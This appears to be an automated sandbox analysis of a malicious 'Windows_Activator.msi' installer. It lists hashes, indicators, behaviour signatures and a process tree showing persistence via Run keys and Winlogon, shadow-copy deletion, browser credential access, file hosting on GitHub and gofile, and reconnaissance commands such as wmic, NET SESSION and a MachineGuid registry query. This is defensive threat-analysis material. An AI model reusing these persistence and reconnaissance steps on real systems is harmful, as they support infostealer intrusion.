Analysis
-
max time kernel
145s -
max time network
150s -
platform
windows10-ltsc_2021_x64 -
resource
win10ltsc2021-20250314-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20250314-enlocale:en-usos:windows10-ltsc_2021-x64system -
submitted
28/03/2025, 21:38
Static task
static1
Behavioral task
behavioral1
Sample
Windows_Activator.msi
Resource
win10ltsc2021-20250314-en
General
-
Target
Windows_Activator.msi
-
Size
91.7MB
-
MD5
16bb1e428b2b74fe63b3a927a08bb78c
-
SHA1
6ce14b587b463bb997ce972dbde1d1a67549f55f
-
SHA256
e8abbc51707b68cca30ecfe80efd6eeee973eb9db5c59435235273064385e215
-
SHA512
a389e44dfcbe1245e16f7e7947dd7b5e727bb78796a62284e65887ec40da0dc36f3c87bf3470eec79e5d3e859ab6902405c5dac387986045c97b997ed54fa6de
-
SSDEEP
1572864:QexuiLcspU3rbhowV2e5t+H7b8REE+T649ua4GWbslX3hriLaIIPXEK3:Qe9LcsArVL5tzE7T64wa4GdX3hriLahb
Malware Config
Signatures
-
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
pid Process 5924 powershell.exe 3048 powershell.exe 5008 powershell.exe 5816 powershell.exe 3544 powershell.exe 4572 powershell.exe 4512 powershell.exe 5580 powershell.exe 4528 powershell.exe 2596 powershell.exe 4124 powershell.exe 2948 powershell.exe 6136 powershell.exe 4484 powershell.exe 1916 powershell.exe 5132 powershell.exe 3616 powershell.exe 5824 powershell.exe 4080 powershell.exe 2820 powershell.exe 560 powershell.exe 1744 powershell.exe 2076 powershell.exe 5188 powershell.exe 3140 powershell.exe 5812 powershell.exe 1952 powershell.exe 6108 powershell.exe 6048 powershell.exe 4008 powershell.exe 3672 powershell.exe 6016 powershell.exe 4532 powershell.exe 5536 powershell.exe -
Creates new service(s) 2 TTPs
-
Disables Task Manager via registry modification
-
Uses browser remote debugging 2 TTPs 9 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 2272 chrome.exe 4932 chrome.exe 1564 chrome.exe 228 msedge.exe 2820 msedge.exe 5420 chrome.exe 5912 msedge.exe 6068 msedge.exe 4584 msedge.exe -
Clipboard Data 1 TTPs 64 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
pid Process 3292 cmd.exe 5464 powershell.exe 2820 powershell.exe 564 powershell.exe 1996 powershell.exe 1008 cmd.exe 3592 cmd.exe 4888 cmd.exe 5424 cmd.exe 6084 cmd.exe 4416 cmd.exe 4772 cmd.exe 4392 cmd.exe 3952 powershell.exe 2960 powershell.exe 468 cmd.exe 2252 cmd.exe 5756 powershell.exe 5960 powershell.exe 4696 cmd.exe 316 cmd.exe 5236 cmd.exe 5124 cmd.exe 2768 powershell.exe 5936 cmd.exe 5452 cmd.exe 4460 cmd.exe 4064 powershell.exe 2052 powershell.exe 2964 powershell.exe 3840 powershell.exe 4572 cmd.exe 3572 powershell.exe 1220 cmd.exe 2028 cmd.exe 5224 cmd.exe 2028 cmd.exe 3456 cmd.exe 5280 cmd.exe 2376 cmd.exe 2948 powershell.exe 4124 powershell.exe 1540 cmd.exe 5992 powershell.exe 2968 powershell.exe 1660 cmd.exe 5612 cmd.exe 396 cmd.exe 980 cmd.exe 5336 cmd.exe 5388 cmd.exe 5532 powershell.exe 2616 powershell.exe 5460 powershell.exe 4764 cmd.exe 3152 powershell.exe 3048 cmd.exe 5268 powershell.exe 1036 powershell.exe 856 powershell.exe 780 powershell.exe 2100 cmd.exe 5852 powershell.exe 4960 powershell.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows_Activator.exe Windows_Activator.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3174447216-2582055397-1659630574-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows_Health_Courtage_GyasyL = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\CachedFiles\\Windows_Activator.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3174447216-2582055397-1659630574-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Windows_Health_Courtage_GyasyL = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\CachedFiles\\Windows_Activator.exe" reg.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 6 1612 msiexec.exe -
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\D: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\D: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\Y: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 23 IoCs
flow ioc 33 raw.githubusercontent.com 38 raw.githubusercontent.com 39 raw.githubusercontent.com 44 raw.githubusercontent.com 66 raw.githubusercontent.com 68 raw.githubusercontent.com 69 raw.githubusercontent.com 71 raw.githubusercontent.com 34 raw.githubusercontent.com 65 raw.githubusercontent.com 67 raw.githubusercontent.com 204 api.gofile.io 280 raw.githubusercontent.com 281 raw.githubusercontent.com 32 raw.githubusercontent.com 42 raw.githubusercontent.com 45 raw.githubusercontent.com 70 raw.githubusercontent.com 75 raw.githubusercontent.com 43 raw.githubusercontent.com 46 raw.githubusercontent.com 203 api.gofile.io 301 api.gofile.io -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 63 ipinfo.io 64 ipinfo.io -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3174447216-2582055397-1659630574-1000\Control Panel\International\Geo\Nation Windows_Activator.exe -
Drops file in System32 directory 2 IoCs
description ioc Process File opened for modification C:\Windows\system32\Recovery\ReAgent.xml ReAgentc.exe File opened for modification C:\Windows\system32\Recovery ReAgentc.exe -
Enumerates processes with tasklist 1 TTPs 1 IoCs
pid Process 6080 tasklist.exe -
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\system32\\userinit.exe,C:\\Program Files\\Windows NT\\TableTextService\\Windows_Activator.exe" reg.exe -
Drops file in Program Files directory 1 IoCs
description ioc Process File created C:\Program Files\Windows NT\TableTextService\Windows_Activator.exe Windows_Activator.exe -
Drops file in Windows directory 14 IoCs
description ioc Process File opened for modification C:\Windows\Panther\UnattendGC\diagerr.xml ReAgentc.exe File opened for modification C:\Windows\Installer\e57f472.msi msiexec.exe File opened for modification C:\Windows\Installer\MSIFA4E.tmp msiexec.exe File opened for modification C:\Windows\SystemTemp chrome.exe File opened for modification C:\Windows\SystemTemp msedge.exe File opened for modification C:\Windows\Logs\ReAgent\ReAgent.log ReAgentc.exe File opened for modification C:\Windows\Panther\UnattendGC\diagwrn.xml ReAgentc.exe File created C:\Windows\Installer\e57f472.msi msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File created C:\Windows\Installer\SourceHash{0A13A71E-135D-4025-BD15-1511BDD791DB} msiexec.exe File created C:\Windows\Installer\e57f474.msi msiexec.exe File opened for modification C:\Windows\Panther\UnattendGC\setuperr.log ReAgentc.exe -
Executes dropped EXE 5 IoCs
pid Process 760 Windows_Activator.exe 1696 Windows_Activator.exe 5016 Windows_Activator.exe 420 Windows_Activator.exe 5520 Windows_Activator.exe -
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4064 sc.exe -
Loads dropped DLL 12 IoCs
pid Process 760 Windows_Activator.exe 760 Windows_Activator.exe 760 Windows_Activator.exe 760 Windows_Activator.exe 760 Windows_Activator.exe 760 Windows_Activator.exe 1696 Windows_Activator.exe 5016 Windows_Activator.exe 1696 Windows_Activator.exe 1696 Windows_Activator.exe 1696 Windows_Activator.exe 1696 Windows_Activator.exe -
Access Token Manipulation: Create Process with Token 1 TTPs 2 IoCs
pid Process 5136 cmd.exe 6048 powershell.exe -
Event Triggered Execution: Installer Packages 2 TTPs 1 IoCs
pid Process 1612 msiexec.exe -
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 5728 cmd.exe 4024 reg.exe -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 4804 cmd.exe 5276 netsh.exe -
Checks SCSI registry key(s) 3 TTPs 5 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000474a8ca2bbcd5d8d0000000000000000000000000000000000000000000000000000000000000000000000000000000000001071020000000000c01200000000ffffffff000000002701010000883801474a8ca20000000000001071020000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d083020000000000c050e1000000ffffffff000000000700010000e84101474a8ca2000000000000d08302000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000090d4e30000000000000005000000ffffffff00000000070001000048ea71474a8ca200000000000090d4e300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000474a8ca200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr vssvc.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier msedge.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Interacts with shadow copies 3 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 5444 vssadmin.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry msedge.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133876716015914059" msedge.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3174447216-2582055397-1659630574-1000\{88C50C14-D59A-4AAE-92F2-0EE4002309E8} msedge.exe -
Runs net.exe
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5644 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4052 msiexec.exe 4052 msiexec.exe 760 Windows_Activator.exe 760 Windows_Activator.exe 760 Windows_Activator.exe 760 Windows_Activator.exe 760 Windows_Activator.exe 760 Windows_Activator.exe 760 Windows_Activator.exe 760 Windows_Activator.exe 2412 WMIC.exe 2412 WMIC.exe 2412 WMIC.exe 2412 WMIC.exe 760 Windows_Activator.exe 760 Windows_Activator.exe 760 Windows_Activator.exe 760 Windows_Activator.exe 760 Windows_Activator.exe 760 Windows_Activator.exe 760 Windows_Activator.exe 760 Windows_Activator.exe 760 Windows_Activator.exe 760 Windows_Activator.exe 760 Windows_Activator.exe 760 Windows_Activator.exe 760 Windows_Activator.exe 760 Windows_Activator.exe 760 Windows_Activator.exe 760 Windows_Activator.exe 760 Windows_Activator.exe 760 Windows_Activator.exe 760 Windows_Activator.exe 760 Windows_Activator.exe 760 Windows_Activator.exe 760 Windows_Activator.exe 760 Windows_Activator.exe 760 Windows_Activator.exe 760 Windows_Activator.exe 760 Windows_Activator.exe 760 Windows_Activator.exe 760 Windows_Activator.exe 760 Windows_Activator.exe 760 Windows_Activator.exe 760 Windows_Activator.exe 760 Windows_Activator.exe 760 Windows_Activator.exe 760 Windows_Activator.exe 760 Windows_Activator.exe 760 Windows_Activator.exe 760 Windows_Activator.exe 760 Windows_Activator.exe 760 Windows_Activator.exe 760 Windows_Activator.exe 760 Windows_Activator.exe 760 Windows_Activator.exe 760 Windows_Activator.exe 760 Windows_Activator.exe 760 Windows_Activator.exe 760 Windows_Activator.exe 760 Windows_Activator.exe 760 Windows_Activator.exe 760 Windows_Activator.exe 760 Windows_Activator.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
pid Process 2272 chrome.exe 2272 chrome.exe 2272 chrome.exe 5912 msedge.exe 5912 msedge.exe 5912 msedge.exe 5912 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 1612 msiexec.exe Token: SeIncreaseQuotaPrivilege 1612 msiexec.exe Token: SeSecurityPrivilege 4052 msiexec.exe Token: SeCreateTokenPrivilege 1612 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 1612 msiexec.exe Token: SeLockMemoryPrivilege 1612 msiexec.exe Token: SeIncreaseQuotaPrivilege 1612 msiexec.exe Token: SeMachineAccountPrivilege 1612 msiexec.exe Token: SeTcbPrivilege 1612 msiexec.exe Token: SeSecurityPrivilege 1612 msiexec.exe Token: SeTakeOwnershipPrivilege 1612 msiexec.exe Token: SeLoadDriverPrivilege 1612 msiexec.exe Token: SeSystemProfilePrivilege 1612 msiexec.exe Token: SeSystemtimePrivilege 1612 msiexec.exe Token: SeProfSingleProcessPrivilege 1612 msiexec.exe Token: SeIncBasePriorityPrivilege 1612 msiexec.exe Token: SeCreatePagefilePrivilege 1612 msiexec.exe Token: SeCreatePermanentPrivilege 1612 msiexec.exe Token: SeBackupPrivilege 1612 msiexec.exe Token: SeRestorePrivilege 1612 msiexec.exe Token: SeShutdownPrivilege 1612 msiexec.exe Token: SeDebugPrivilege 1612 msiexec.exe Token: SeAuditPrivilege 1612 msiexec.exe Token: SeSystemEnvironmentPrivilege 1612 msiexec.exe Token: SeChangeNotifyPrivilege 1612 msiexec.exe Token: SeRemoteShutdownPrivilege 1612 msiexec.exe Token: SeUndockPrivilege 1612 msiexec.exe Token: SeSyncAgentPrivilege 1612 msiexec.exe Token: SeEnableDelegationPrivilege 1612 msiexec.exe Token: SeManageVolumePrivilege 1612 msiexec.exe Token: SeImpersonatePrivilege 1612 msiexec.exe Token: SeCreateGlobalPrivilege 1612 msiexec.exe Token: SeBackupPrivilege 2008 vssvc.exe Token: SeRestorePrivilege 2008 vssvc.exe Token: SeAuditPrivilege 2008 vssvc.exe Token: SeBackupPrivilege 4052 msiexec.exe Token: SeRestorePrivilege 4052 msiexec.exe Token: SeRestorePrivilege 4052 msiexec.exe Token: SeTakeOwnershipPrivilege 4052 msiexec.exe Token: SeRestorePrivilege 4052 msiexec.exe Token: SeTakeOwnershipPrivilege 4052 msiexec.exe Token: SeRestorePrivilege 4052 msiexec.exe Token: SeTakeOwnershipPrivilege 4052 msiexec.exe Token: SeRestorePrivilege 4052 msiexec.exe Token: SeTakeOwnershipPrivilege 4052 msiexec.exe Token: SeRestorePrivilege 4052 msiexec.exe Token: SeTakeOwnershipPrivilege 4052 msiexec.exe Token: SeRestorePrivilege 4052 msiexec.exe Token: SeTakeOwnershipPrivilege 4052 msiexec.exe Token: SeRestorePrivilege 4052 msiexec.exe Token: SeTakeOwnershipPrivilege 4052 msiexec.exe Token: SeRestorePrivilege 4052 msiexec.exe Token: SeTakeOwnershipPrivilege 4052 msiexec.exe Token: SeRestorePrivilege 4052 msiexec.exe Token: SeTakeOwnershipPrivilege 4052 msiexec.exe Token: SeRestorePrivilege 4052 msiexec.exe Token: SeTakeOwnershipPrivilege 4052 msiexec.exe Token: SeRestorePrivilege 4052 msiexec.exe Token: SeTakeOwnershipPrivilege 4052 msiexec.exe Token: SeRestorePrivilege 4052 msiexec.exe Token: SeTakeOwnershipPrivilege 4052 msiexec.exe Token: SeRestorePrivilege 4052 msiexec.exe Token: SeTakeOwnershipPrivilege 4052 msiexec.exe Token: SeRestorePrivilege 4052 msiexec.exe -
Suspicious use of FindShellTrayWindow 5 IoCs
pid Process 1612 msiexec.exe 1612 msiexec.exe 2272 chrome.exe 5912 msedge.exe 5912 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4052 wrote to memory of 984 4052 msiexec.exe 92 PID 4052 wrote to memory of 984 4052 msiexec.exe 92 PID 4052 wrote to memory of 760 4052 msiexec.exe 94 PID 4052 wrote to memory of 760 4052 msiexec.exe 94 PID 760 wrote to memory of 3112 760 Windows_Activator.exe 96 PID 760 wrote to memory of 3112 760 Windows_Activator.exe 96 PID 3112 wrote to memory of 2024 3112 cmd.exe 98 PID 3112 wrote to memory of 2024 3112 cmd.exe 98 PID 760 wrote to memory of 1696 760 Windows_Activator.exe 100 PID 760 wrote to memory of 1696 760 Windows_Activator.exe 100 PID 760 wrote to memory of 1696 760 Windows_Activator.exe 100 PID 760 wrote to memory of 1696 760 Windows_Activator.exe 100 PID 760 wrote to memory of 1696 760 Windows_Activator.exe 100 PID 760 wrote to memory of 1696 760 Windows_Activator.exe 100 PID 760 wrote to memory of 1696 760 Windows_Activator.exe 100 PID 760 wrote to memory of 1696 760 Windows_Activator.exe 100 PID 760 wrote to memory of 1696 760 Windows_Activator.exe 100 PID 760 wrote to memory of 1696 760 Windows_Activator.exe 100 PID 760 wrote to memory of 1696 760 Windows_Activator.exe 100 PID 760 wrote to memory of 1696 760 Windows_Activator.exe 100 PID 760 wrote to memory of 1696 760 Windows_Activator.exe 100 PID 760 wrote to memory of 1696 760 Windows_Activator.exe 100 PID 760 wrote to memory of 1696 760 Windows_Activator.exe 100 PID 760 wrote to memory of 1696 760 Windows_Activator.exe 100 PID 760 wrote to memory of 1696 760 Windows_Activator.exe 100 PID 760 wrote to memory of 1696 760 Windows_Activator.exe 100 PID 760 wrote to memory of 1696 760 Windows_Activator.exe 100 PID 760 wrote to memory of 1696 760 Windows_Activator.exe 100 PID 760 wrote to memory of 1696 760 Windows_Activator.exe 100 PID 760 wrote to memory of 1696 760 Windows_Activator.exe 100 PID 760 wrote to memory of 1696 760 Windows_Activator.exe 100 PID 760 wrote to memory of 1696 760 Windows_Activator.exe 100 PID 760 wrote to memory of 1696 760 Windows_Activator.exe 100 PID 760 wrote to memory of 1696 760 Windows_Activator.exe 100 PID 760 wrote to memory of 1696 760 Windows_Activator.exe 100 PID 760 wrote to memory of 1696 760 Windows_Activator.exe 100 PID 760 wrote to memory of 1696 760 Windows_Activator.exe 100 PID 760 wrote to memory of 1696 760 Windows_Activator.exe 100 PID 760 wrote to memory of 5016 760 Windows_Activator.exe 101 PID 760 wrote to memory of 5016 760 Windows_Activator.exe 101 PID 760 wrote to memory of 2784 760 Windows_Activator.exe 102 PID 760 wrote to memory of 2784 760 Windows_Activator.exe 102 PID 2784 wrote to memory of 2412 2784 cmd.exe 104 PID 2784 wrote to memory of 2412 2784 cmd.exe 104 PID 760 wrote to memory of 3908 760 Windows_Activator.exe 106 PID 760 wrote to memory of 3908 760 Windows_Activator.exe 106 PID 3908 wrote to memory of 1436 3908 cmd.exe 108 PID 3908 wrote to memory of 1436 3908 cmd.exe 108 PID 1436 wrote to memory of 3024 1436 net.exe 109 PID 1436 wrote to memory of 3024 1436 net.exe 109 PID 760 wrote to memory of 3152 760 Windows_Activator.exe 110 PID 760 wrote to memory of 3152 760 Windows_Activator.exe 110 PID 760 wrote to memory of 4608 760 Windows_Activator.exe 112 PID 760 wrote to memory of 4608 760 Windows_Activator.exe 112 PID 3152 wrote to memory of 4576 3152 cmd.exe 176 PID 3152 wrote to memory of 4576 3152 cmd.exe 176 PID 760 wrote to memory of 2596 760 Windows_Activator.exe 115 PID 760 wrote to memory of 2596 760 Windows_Activator.exe 115 PID 760 wrote to memory of 3140 760 Windows_Activator.exe 174 PID 760 wrote to memory of 3140 760 Windows_Activator.exe 174 PID 760 wrote to memory of 4124 760 Windows_Activator.exe 117 PID 760 wrote to memory of 4124 760 Windows_Activator.exe 117 PID 760 wrote to memory of 3544 760 Windows_Activator.exe 118 PID 760 wrote to memory of 3544 760 Windows_Activator.exe 118 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Windows\system32\msiexec.exemsiexec.exe /I C:\Users\Admin\AppData\Local\Temp\Windows_Activator.msi1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Event Triggered Execution: Installer Packages
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1612
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4052 -
C:\Windows\system32\srtasks.exeC:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:22⤵PID:984
-
-
C:\Users\Admin\AppData\Local\Programs\raylike\Windows_Activator.exe"C:\Users\Admin\AppData\Local\Programs\raylike\Windows_Activator.exe"2⤵
- Drops startup file
- Checks computer location settings
- Drops file in Program Files directory
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:760 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "chcp"3⤵
- Suspicious use of WriteProcessMemory
PID:3112 -
C:\Windows\system32\chcp.comchcp4⤵PID:2024
-
-
-
C:\Users\Admin\AppData\Local\Programs\raylike\Windows_Activator.exe"C:\Users\Admin\AppData\Local\Programs\raylike\Windows_Activator.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\raylike" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1924 --field-trial-handle=1928,i,3639591167390054574,13720549911876790569,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:23⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1696
-
-
C:\Users\Admin\AppData\Local\Programs\raylike\Windows_Activator.exe"C:\Users\Admin\AppData\Local\Programs\raylike\Windows_Activator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\raylike" --mojo-platform-channel-handle=1960 --field-trial-handle=1928,i,3639591167390054574,13720549911876790569,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:83⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5016
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=760 get ExecutablePath"3⤵
- Suspicious use of WriteProcessMemory
PID:2784 -
C:\Windows\System32\Wbem\WMIC.exewmic process where processid=760 get ExecutablePath4⤵
- Suspicious behavior: EnumeratesProcesses
PID:2412
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "NET SESSION"3⤵
- Suspicious use of WriteProcessMemory
PID:3908 -
C:\Windows\system32\net.exeNET SESSION4⤵
- Suspicious use of WriteProcessMemory
PID:1436 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 SESSION5⤵PID:3024
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Cryptography" /v MachineGuid"3⤵
- Suspicious use of WriteProcessMemory
PID:3152 -
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Cryptography" /v MachineGuid4⤵PID:4576
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "echo %COMPUTERNAME%.%USERDNSDOMAIN%"3⤵PID:4608
-
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -3⤵
- Command and Scripting Interpreter: PowerShell
PID:2596
-
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -3⤵
- Command and Scripting Interpreter: PowerShell
PID:3140
-
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -3⤵
- Command and Scripting Interpreter: PowerShell
PID:4124
-
-
